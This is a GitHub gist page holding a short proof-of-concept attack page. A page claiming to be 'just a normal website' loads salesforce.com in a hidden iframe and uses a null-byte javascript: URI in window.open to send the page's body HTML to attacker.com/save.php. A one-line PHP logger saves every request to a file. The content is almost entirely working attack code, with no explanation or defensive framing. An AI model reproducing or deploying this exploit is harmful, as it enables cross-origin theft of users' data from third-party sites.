Skip to content

Instantly share code, notes, and snippets.

@joswr1ght
Created January 12, 2015 21:37
Show Gist options
  • Save joswr1ght/343b3e5079e8153930bd to your computer and use it in GitHub Desktop.
Save joswr1ght/343b3e5079e8153930bd to your computer and use it in GitHub Desktop.
<html><head></head>
<body>
This is just a normal website...
<iframe id="if" name="test" height="0" width="0" src="http://www.salesforce.com"></iframe>
<script>
document.getElementById("if").style.visibility="hidden";
window.open("\u0000javascript:
var i=new Image();
i.src='http://attacker.com/save.php?'+document.body.innerHTML;
document.body.appendChild(i);
");
</script>
</body>
</html>
<?php file_put_contents("save.txt", json_encode($_GET). "\n", FILE_APPEND); ?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment